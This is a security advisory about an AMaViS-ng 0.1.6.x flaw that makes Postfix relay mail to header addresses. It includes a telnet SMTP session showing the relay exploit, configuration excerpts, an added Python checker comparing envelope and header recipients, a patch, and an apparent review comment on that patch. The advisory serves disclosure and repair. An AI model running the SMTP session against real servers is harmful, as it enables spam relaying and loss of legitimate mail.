9th Apr 2003 [SBWID-6124]
COMMAND
AMaViS-ng possible open relay and mail loss
SYSTEMS AFFECTED
AMaViS-ng 0.1.6.x
PROBLEM
Phil Cyc found the following; the report is for Postfix, but the problem
is not specific to it:
With Postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3;
0.1.4.x is not vulnerable), all email gets forwarded to the address
specified by the "To:" header line, ignoring the real envelope recipient
given via "RCPT TO:".
Possible exploit:
--%snip%--
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:[email protected]
(250 ok)
rcpt to:[email protected]
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: [email protected]
To: [email protected]
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)
--%snip%--
Requirements
============
The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x
installed must accept emails for [email protected].
What does it do
===============
[email protected] is sending an email to [email protected]. The header
of this email contains "To: [email protected]". AMaViS-ng parses that
header and reinjects the email to [email protected], so [email protected]
(the real RCPT TO: recipient) never gets it. Since the reinjection comes
from localhost and many Postfix users trust their localhost (no
restrictions for localhost), an attacker can relay email, including
spam, to arbitrary external addresses this way, and legitimate mail to
local recipients is lost whenever the To: header does not match.
configuration files (relevant parts):
=====================================
# $postfix/master.cf
smtp inet n - n - - smtpd -o content_filter filter:
filter unix - n n - - pipe
flags Rq user mail argv /usr/bin/amavis ${sender} -- ${recipient}
# end of master.cf
# $amavis-ng/amavis.conf
[global]
mail-transfer-agent Postfix
[Postfix]
postfix /usr/sbin/sendmail
args -i -f
# end of amavis.conf
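To make the envelope-versus-header distinction concrete, the following is an added example (Python, not AMaViS-ng's or Postfix's own code). It models both reinjection strategies a content filter can take, the vulnerable one that trusts the To: header and the correct one that uses the envelope recipients Postfix passes on the command line in the "${sender} -- ${recipient}" form from the master.cf fragment above, and flags when the chosen recipients would turn the MX into a relay. The sample message, the addresses and the LOCAL_DOMAINS set (standing in for Postfix's mydestination) are constructed for this example.

```python
"""Envelope-vs-header recipient check for a Postfix pipe(8) content filter.

Added example, not AMaViS-ng or Postfix code. Shows why a filter must
reinject to the envelope recipients handed over on its argv and never to
the addresses found in the (attacker-controlled) "To:" header.
"""
from email import message_from_string
from email.utils import getaddresses

# Constructed sample data modelled on the transcript above; the page's
# own addresses are redacted, so these are placeholders.
ENVELOPE_SENDER = "attacker@spam.example"        # MAIL FROM:
ENVELOPE_RCPT = "victim@somemx.example"          # RCPT TO:
SAMPLE_MESSAGE = (
    "From: attacker@spam.example\n"
    "To: unsuspecting@thirdparty.example\n"      # header To: differs
    "Subject: AMaViS-ng 0.1.6.x bug\n"
    "\n"
    "body\n"
)

# Assumed: the domains this MX accepts mail for (Postfix mydestination).
LOCAL_DOMAINS = {"somemx.example"}


def parse_filter_argv(argv):
    """Parse the argv Postfix builds from
    'argv /usr/bin/amavis ${sender} -- ${recipient}'.

    Returns (sender, [recipients]). An empty sender (a bounce) becomes
    "<>". Tolerates an optional leading -f / -d, and consumes the "--"
    separator instead of mistaking it for a recipient.
    """
    args = list(argv)
    if args and args[0] == "-f":
        args.pop(0)
    sender = args.pop(0) if args else ""
    if sender == "":
        sender = "<>"
    if args and args[0] == "-d":
        args.pop(0)
    if args and args[0] == "--":
        args.pop(0)
    recipients = [a for a in args if a != ""]
    return sender, recipients


def recipients_from_header(raw_message):
    """Vulnerable choice: delivery targets taken from the To: header,
    i.e. from data the SMTP client supplied inside DATA."""
    msg = message_from_string(raw_message)
    return [addr for _, addr in getaddresses(msg.get_all("To", [])) if addr]


def recipients_from_envelope(argv):
    """Correct choice: the RCPT TO: addresses Postfix passed on argv."""
    return parse_filter_argv(argv)[1]


def domain_of(addr):
    return addr.rpartition("@")[2].lower()


def would_relay(recipients, local_domains):
    """True if any reinjected recipient lies outside the domains this
    host accepts mail for: the filter would act as an open relay."""
    return any(domain_of(r) not in local_domains for r in recipients)


def simulate(raw_message, argv, local_domains, use_header):
    """Run one reinjection strategy and report where mail would go."""
    if use_header:
        rcpts = recipients_from_header(raw_message)
    else:
        rcpts = recipients_from_envelope(argv)
    return {"recipients": rcpts, "relays": would_relay(rcpts, local_domains)}


if __name__ == "__main__":
    argv = [ENVELOPE_SENDER, "--", ENVELOPE_RCPT]
    print("header-based  :", simulate(SAMPLE_MESSAGE, argv, LOCAL_DOMAINS, True))
    print("envelope-based:", simulate(SAMPLE_MESSAGE, argv, LOCAL_DOMAINS, False))
```

Run stand-alone it prints the header-based result with relays=True (the third-party address would be reinjected via localhost) and the envelope-based result with relays=False and the victim as the only recipient. The same check is useful as a regression test against any pipe-based filter: feed it a message whose header To: points off-site and confirm the reinjected recipients equal the envelope list.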
SOLUTION
Update 10 Apr.
===============
Phil Cyc proposed the following patch, as the software maintainer had
not released one.
diff -Nru amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm
--- amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm Tue Mar 18 00:04:21 2003
+++ amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm Tue Apr 8 23:28:09 2003
@@ -112,22 +112,11 @@
writelog($args,LOG_DEBUG, "Called as amavis ".join(' ',@ARGV));
- while (shift @ARGV) {
- /^-f$/ && next; # ignore "-f"
- /^-d$/ && next; # ignore "-d"
- s/^(.*)$/$1/; # untaint sender or recipient
- if (not defined $$args{'sender'}) {
- if (/^$/) {
- $$args{'sender'} = "<>";
- }
- else {
- $$args{'sender'} = $_;
- }
- }
- else {
- push @{$$args{'recipients'}}, $_;
- }
- }
+ shift @ARGV if $ARGV[0] eq "-f";
+ $$args{'sender'} = shift @ARGV;
+ $$args{'sender'} = "<>" if (!$$args{'sender'});
+ shift @ARGV if $ARGV[0] eq "-d";
+ push @{$$args{'recipients'}}, @ARGV;
# Message file has been written, reset file pointer and put it into
# the record.
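Review bot: the new argument handling in this hunk still does not consume the "--" separator that the master.cf above passes (argv /usr/bin/amavis ${sender} -- ${recipient}): after the sender is shifted, $ARGV[0] is "--", which is neither "-f" nor "-d", so `push @{$$args{'recipients'}}, @ARGV;` records "--" as a recipient. Add `shift @ARGV if $ARGV[0] eq "--";` before the push, or drop "--" from the pipe argv. Two smaller points: the rewrite discards the `s/^(.*)$/$1/;` untaint step, so if amavis runs under -T the sender and recipients taken from @ARGV remain tainted when handed to the MTA; and `shift @ARGV if $ARGV[0] eq "-f";` warns about an uninitialized value when the script is invoked with no arguments, which `@ARGV && $ARGV[0] eq "-f"` avoids. The removed loop was genuinely broken, which supports replacing it: `while (shift @ARGV)` never assigns the shifted element to $_, so the -f/-d checks and the sender/recipient assignments operated on stale $_ rather than on the arguments, and the loop also stopped early on an empty (null) sender.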